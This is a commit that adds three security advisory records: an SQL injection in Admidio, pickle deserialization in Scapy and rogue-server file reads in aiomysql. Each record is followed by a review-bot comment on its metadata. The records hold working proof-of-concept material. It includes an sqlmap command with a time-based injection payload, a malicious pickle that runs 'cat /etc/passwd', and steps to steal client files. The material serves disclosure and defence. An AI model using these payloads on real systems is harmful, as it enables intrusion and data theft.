
Commit ff17efc

1 parent 1d9b1f8 commit ff17efc


3 files changed: +189 −0 lines changed

Lines changed: 62 additions & 0 deletions
@@ -0,0 +1,62 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-2v5m-cq9w-fc33",
4+
"modified": "2025-10-22T16:46:03Z",
5+
"published": "2025-10-22T16:46:03Z",
6+
"aliases": [],
7+
"summary": "Admidio Vulnerable to Authenticated SQL Injection in Member Assignment Functionality",
8+
"details": "### Summary\n\nAn authenticated SQL injection vulnerability exists in the member assignment data retrieval functionality of Admidio. Any authenticated user with permissions to assign members to a role (such as an administrator) can exploit this vulnerability to execute arbitrary SQL commands. This can lead to a full compromise of the application's database, including reading, modifying, or deleting all data. The vulnerability is present in the latest version, 4.3.16.\n\n### Details\n\nThe vulnerability is located in the `adm_program/modules/groups-roles/members_assignment_data.php` script. This script handles an AJAX request to fetch a list of users for role assignment. The `filter_rol_uuid` GET parameter is not properly sanitized before being used in a raw SQL query.\n\n**File:** `adm_program/modules/groups-roles/members_assignment_data.php`\n```php\n// ... \n// The parameter is retrieved from the GET request without sufficient sanitization for SQL context.\n$getFilterRoleUuid = admFuncVariableIsValid($_GET, 'filter_rol_uuid', 'string');\n$getMembersShowAll = admFuncVariableIsValid($_GET, 'mem_show_all', 'bool', array('defaultValue' => false));\n\n// ... \n$filterRoleCondition = '';\nif ($getMembersShowAll) {\n $getFilterRoleUuid = 0;\n} else {\n // show only members of current organization\n if ($getFilterRoleUuid !== '') {\n // VULNERABLE CODE: $getFilterRoleUuid is directly concatenated into the query string.\n $filterRoleCondition = ' AND rol_uuid = \\''.$getFilterRoleUuid . 
'\\'';\n }\n}\n\n// ...\n// The vulnerable $filterRoleCondition is then used inside a subselect.\n$sqlSubSelect = '(SELECT COUNT(*) AS count_this\n FROM '.TBL_MEMBERS.'\n INNER JOIN '.TBL_ROLES.'\n ON rol_id = mem_rol_id\n INNER JOIN '.TBL_CATEGORIES.'\n ON cat_id = rol_cat_id\n WHERE mem_usr_id = usr_id\n AND mem_begin <= \\''.DATE_NOW.'\\'\n AND mem_end > \\''.DATE_NOW.'\\'\n '.$filterRoleCondition.'\n AND rol_valid = true\n AND cat_name_intern <> \\'EVENTS\\'\n AND cat_org_id = '.$gCurrentOrgId.')';\n// ...\n```\n\nAs shown above, the value of `$getFilterRoleUuid` is directly concatenated into the `$filterRoleCondition` variable, which is then embedded within a larger SQL query (`$sqlSubSelect`). This allows an attacker to break out of the string literal and inject arbitrary SQL commands.\n\n### PoC (Proof of Concept)\n\n**Prerequisites:**\n1. A running instance of Admidio (tested on version 4.3.16).\n2. An authenticated user session with permissions to assign members to a role (e.g., the default 'admin' user).\n\n**Execution:**\nThe vulnerability can be triggered by manipulating the `filter_rol_uuid` parameter in the request to `/adm_program/modules/groups-roles/members_assignment_data.php`. Due to the large number of parameters, the easiest way to reproduce this is by capturing a legitimate request and replaying it with `sqlmap`.\n\n1. Log in to Admidio as an administrator.\n2. Navigate to `Groups / Roles`.\n3. Click the \"Assign members\" icon for any existing role.\n4. Using a web proxy like Burp Suite, intercept the GET request made to `/adm_program/modules/groups-roles/members_assignment_data.php`.\n5. Save the entire raw request to a text file (e.g., `admidio_request.txt`).\n6. 
Run the following `sqlmap` command to confirm the time-based blind SQL injection:\n\n```bash\nsqlmap -r /path/to/admidio_request.txt -p filter_rol_uuid --technique=T --dbms=mysql --current-db\n```\n\n**Result:**\n`sqlmap` will successfully identify and exploit the time-based blind SQL injection vulnerability.\n\n```\n---\nParameter: filter_rol_uuid (GET)\n Type: time-based blind\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n Payload: role_uuid=...&filter_rol_uuid=' AND (SELECT 3332 FROM (SELECT(SLEEP(5)))vqnl) AND 'ENdG'='ENdG&...\n---\n[INFO] the back-end DBMS is MySQL\nback-end DBMS: MySQL >= 5.0.12\n[INFO] fetching current database\n[INFO] retrieved: admidio\ncurrent database: 'admidio'\n```\nThis confirms that an attacker can execute arbitrary SQL queries and extract information from the database.",
9+
"severity": [
10+
{
11+
"type": "CVSS_V3",
12+
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
13+
}
14+
],
15+
"affected": [
16+
{
17+
"package": {
18+
"ecosystem": "Packagist",
19+
"name": "admidio/admidio"
20+
},
21+
"ranges": [
22+
{
23+
"type": "ECOSYSTEM",
24+
"events": [
25+
{
26+
"introduced": "0"
27+
},
28+
{
29+
"fixed": "4.3.17"
30+
}
31+
]
32+
}
33+
],
34+
"database_specific": {
35+
"last_known_affected_version_range": "<= 4.3.16"
36+
}
37+
}
38+
],
39+
"references": [
40+
{
41+
"type": "WEB",
42+
"url": "https://github.com/Admidio/admidio/security/advisories/GHSA-2v5m-cq9w-fc33"
43+
},
44+
{
45+
"type": "WEB",
46+
"url": "https://github.com/Admidio/admidio/commit/fde81ae869e88a3cf42201f2548d57df785a37cb"
47+
},
48+
{
49+
"type": "PACKAGE",
50+
"url": "https://github.com/Admidio/admidio"
51+
}
52+
],
53+
"database_specific": {
54+
"cwe_ids": [
55+
"CWE-89"
56+
],
57+
"severity": "HIGH",
58+
"github_reviewed": true,
59+
"github_reviewed_at": "2025-10-22T16:46:03Z",
60+
"nvd_published_at": null
61+
}
62+
}
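Review bot: `aliases` is empty and `nvd_published_at` is null, so this record carries no CVE identifier for GHSA-2v5m-cq9w-fc33; if one is assigned it needs to be added to `aliases`, otherwise scanners that key on CVE ids will not match this entry. The `details` also end at the PoC and never say what 4.3.17 changes; a closing line pointing readers at the referenced fix commit fde81ae869e88a3cf42201f2548d57df785a37cb (already in `references`) would tell them what to verify after upgrading. The version data are consistent as written: `"fixed": "4.3.17"` agrees with `"last_known_affected_version_range": "<= 4.3.16"` and with the text's "present in the latest version, 4.3.16", and `PR:H` in the CVSS vector matches the stated requirement of role-assignment permissions.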
Lines changed: 59 additions & 0 deletions
@@ -0,0 +1,59 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-cq46-m9x9-j8w2",
4+
"modified": "2025-10-22T16:45:49Z",
5+
"published": "2025-10-22T16:45:49Z",
6+
"aliases": [],
7+
"summary": "Scapy Session Loading Vulnerable to Arbitrary Code Execution via Untrusted Pickle Deserialization",
8+
"details": "### Summary\n\nAn unsafe deserialization vulnerability in Scapy <v2.7.0 allows attackers to execute arbitrary code **when a malicious session file is locally loaded via the `-s` option**. This requires convincing a user to manually load a malicious session file.\n\n---\n\n### Details\n\nScapy’s interactive shell supports session loading using gzip-compressed pickle files:\n\n```bash\n./run_scapy -s <session_file.pkl.gz>\n```\n\nInternally, this triggers:\n\n```python\n# main.py\nSESSION = pickle.load(gzip.open(session_name, \"rb\"))\n```\n\nSince no validation or restriction is performed on the deserialized object, **any code embedded via `__reduce__()` will be executed immediately**. This makes it trivial for an attacker to drop a malicious `.pkl.gz` in a shared folder and have it executed by unsuspecting users.\n\nThe vulnerability exists in the `load_session` function, which deserializes data using `pickle.load()` on `.pkl.gz` files provided via the `-s` CLI flag or programmatically through `conf.session`.\n\n**Affected lines in source code**:\nhttps://github.com/secdev/scapy/blob/master/scapy/main.py#L569-L572\n\n```python\ntry:\n s = pickle.load(gzip.open(fname, \"rb\"))\nexcept IOError:\n try:\n s = pickle.load(open(fname, \"rb\"))\n```\n\n---\n\n### PoC\n\nCreate a malicious payload:\n\n```python\nimport pickle, os, gzip\n\nclass RCE:\n def __reduce__(self):\n return (os.system, (\"cat /etc/passwd\",))\n\npayload = gzip.compress(pickle.dumps(RCE()))\n\nwith open(\"evil.pkl.gz\", \"wb\") as f:\n f.write(payload)\n```\n\nThen run Scapy with:\n\n```bash\n./run_scapy -s ./evil.pkl.gz\n```\n\nResult: `cat /etc/passwd` executes immediately, before shell is shown.\n\n<img width=\"1035\" height=\"961\" alt=\"Screenshot 2025-08-05 034930-1\" src=\"https://github.com/user-attachments/assets/6748e9bc-57cb-4bd7-977e-e29da8ebc23d\" />\n\n---\n\n### Impact\n\nThis is a classic deserialization vulnerability which leads to Code Execution (CE) when untrusted data 
is deserialized.\n\nAny user who can trick another user into loading a crafted `.pkl.gz` session file (e.g. via `-s` option) can execute arbitrary Python code.\n\n- **Vulnerability type:** Insecure deserialization (Python `pickle`)\n- **CWE**: [CWE-502: Deserialization of Untrusted Data](https://cwe.mitre.org/data/definitions/502.html)\n- **CVSS v4.0 Vector**: `CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N`\n- **CVSS Score**: 5.4 (Medium)\n- **Impact:** Arbitrary Code Execution\n- **Attack vector:** Local or supply chain (malicious `.pkl.gz`)\n- **Affected users:** Any user who loads session files (even interactively)\n- **Affected version:** **Scapy v2.6.1**\n\n---\n\n### Mitigations\n\n- Do not use 'sessions' (the -s option when launching Scapy).\n- Use the Scapy 2.7.0+ where the session mechanism has been removed.",
9+
"severity": [
10+
{
11+
"type": "CVSS_V4",
12+
"score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
13+
}
14+
],
15+
"affected": [
16+
{
17+
"package": {
18+
"ecosystem": "PyPI",
19+
"name": "scapy"
20+
},
21+
"ranges": [
22+
{
23+
"type": "ECOSYSTEM",
24+
"events": [
25+
{
26+
"introduced": "0"
27+
},
28+
{
29+
"last_affected": "2.6.1"
30+
}
31+
]
32+
}
33+
]
34+
}
35+
],
36+
"references": [
37+
{
38+
"type": "WEB",
39+
"url": "https://github.com/secdev/scapy/security/advisories/GHSA-cq46-m9x9-j8w2"
40+
},
41+
{
42+
"type": "WEB",
43+
"url": "https://github.com/secdev/scapy/commit/13621d1145b3435e9d03caf20997107a84435c0b"
44+
},
45+
{
46+
"type": "PACKAGE",
47+
"url": "https://github.com/secdev/scapy"
48+
}
49+
],
50+
"database_specific": {
51+
"cwe_ids": [
52+
"CWE-502"
53+
],
54+
"severity": "MODERATE",
55+
"github_reviewed": true,
56+
"github_reviewed_at": "2025-10-22T16:45:49Z",
57+
"nvd_published_at": null
58+
}
59+
}
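Review bot: the affected range closes with `"last_affected": "2.6.1"` even though the `details` state a fix version ("Scapy <v2.7.0", "Use the Scapy 2.7.0+ where the session mechanism has been removed"); when the fix version is known the event should be `"fixed": "2.7.0"`, since `last_affected` leaves 2.7.0 and later as "unknown" for range matchers rather than as safe. In the same text, the bullet "Affected version: Scapy v2.6.1" narrows what the summary and the `"introduced": "0"` event say (every version below 2.7.0); the two should agree. The "Affected lines in source code" link targets `master` with `#L569-L572`, which will drift as `scapy/main.py` changes; a permalink to the pre-fix commit keeps the line anchor valid.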
Lines changed: 68 additions & 0 deletions
@@ -0,0 +1,68 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-r397-ff8c-wv2g",
4+
"modified": "2025-10-22T16:47:10Z",
5+
"published": "2025-10-22T16:47:10Z",
6+
"aliases": [
7+
"CVE-2025-62611"
8+
],
9+
"summary": "aiomysql allows arbitrary access to client files through vulnerability of a malicious MySQL server",
10+
"details": "### Summary\nThe client-side settings are not checked before sending local files to MySQL server, which allows obtaining arbitrary files from the client using a rogue server.\n\n### Details\nIt is possible to create a rogue MySQL server that emulates authorization, ignores client flags and requests arbitrary files from the client by sending a LOAD_LOCAL instruction packet. Related to CVE-2019-2503.\n\n### PoC\nFirst, start up a rogue MySQL server that ignores client-side flags and sends LOAD_LOCAL packet to the client – tested with https://github.com/rmb122/rogue_mysql_server\n\n1. Create a file to be stolen by the rogue server: `echo \"gotcha\" > /tmp/my_secret_file.txt`\n2. Clone the repo: `git clone [email protected]:rmb122/rogue_mysql_server.git && cd rogue_mysql_server`\n3. Build the server: `make rogue_mysql_server`\n4. Generate a sample config: `rogue_mysql_server -generate`\n5. In `config.yaml` change `file_list` to `[\"/tmp/my_secret_file.txt\"]`\n6. Run the server: `./rogue_mysql_server -config config.yaml`\n\nNext, the vulnerability can be seen in action with the following script, which can be run in a second terminal:\n```python3\nimport asyncio\n\nimport aiomysql\n\n\nloop = asyncio.get_event_loop()\n\n\nasync def test_example():\n conn = await aiomysql.connect(\n host=\"127.0.0.1\",\n port=3306,\n user=\"root\",\n password=\"\",\n db=\"mysql\",\n loop=loop,\n local_infile=0, # note that we explicitly forbid local_infile\n )\n\n cursor = await conn.cursor()\n await cursor.execute(\"SELECT 1\")\n print(cursor.description)\n r = await cursor.fetchall()\n print(r)\n await cursor.close()\n conn.close()\n\n\nloop.run_until_complete(test_example())\n```\n\nThe rogue server will output log messages indicating successful file read and save the contents in the `loot/` directory\n```\nlevel=info msg=\"Client from addr [xxx], ID [1] try to query [select 1]\"\nlevel=info msg=\"Now try to read file [/tmp/my_secret_file.txt] from addr [xxx], ID 
[1]\"\nlevel=info msg=\"Read success, stored at [./loot/xxx/1757403852610__tmp_top_secret_file.txt]\"\nlevel=info msg=\"Client leaved, Addr [xxx], ID [1]\"\n```\n\n### Impact\nThis vulnerability impacts products and environments that require connection to untrusted MySQL servers or allow the possibility for them to be compromised.\n\n### Fix suggestion\nCan be fixed by porting relevant changes from PyMySQL – https://github.com/PyMySQL/PyMySQL/commit/b5e17cee46e0706dbfd707cdd2024452f0fb3267",
11+
"severity": [
12+
{
13+
"type": "CVSS_V4",
14+
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "PyPI",
21+
"name": "aiomysql"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "0.3.0"
32+
}
33+
]
34+
}
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "<= 0.2.0"
38+
}
39+
}
40+
],
41+
"references": [
42+
{
43+
"type": "WEB",
44+
"url": "https://github.com/aio-libs/aiomysql/security/advisories/GHSA-r397-ff8c-wv2g"
45+
},
46+
{
47+
"type": "WEB",
48+
"url": "https://github.com/aio-libs/aiomysql/pull/1044"
49+
},
50+
{
51+
"type": "WEB",
52+
"url": "https://github.com/aio-libs/aiomysql/commit/32c4520dae3711367ded74a4726dcb8bb8919538"
53+
},
54+
{
55+
"type": "PACKAGE",
56+
"url": "https://github.com/aio-libs/aiomysql"
57+
}
58+
],
59+
"database_specific": {
60+
"cwe_ids": [
61+
"CWE-73"
62+
],
63+
"severity": "HIGH",
64+
"github_reviewed": true,
65+
"github_reviewed_at": "2025-10-22T16:47:10Z",
66+
"nvd_published_at": null
67+
}
68+
}
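Review bot: the PoC output in `details` does not match its own setup: step 1 and `file_list` use `/tmp/my_secret_file.txt`, but the "Read success" log line reports `1757403852610__tmp_top_secret_file.txt`, so the transcript appears to come from a different run and should either be regenerated or have the file name aligned. The "Fix suggestion" section still reads as an open recommendation ("Can be fixed by porting relevant changes from PyMySQL") although the record already carries `"fixed": "0.3.0"` together with PR #1044 and commit 32c4520dae3711367ded74a4726dcb8bb8919538 in `references`; stating that 0.3.0 contains that fix avoids readers concluding the issue is unresolved. "Related to CVE-2019-2503" appears only in prose; if it is meant to be discoverable it belongs in `references` as a WEB entry (not in `aliases`, since it is a different product's CVE). Finally, the summary phrase "through vulnerability of a malicious MySQL server" is awkward; "via a malicious MySQL server (LOAD DATA LOCAL)" says the same thing more clearly.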
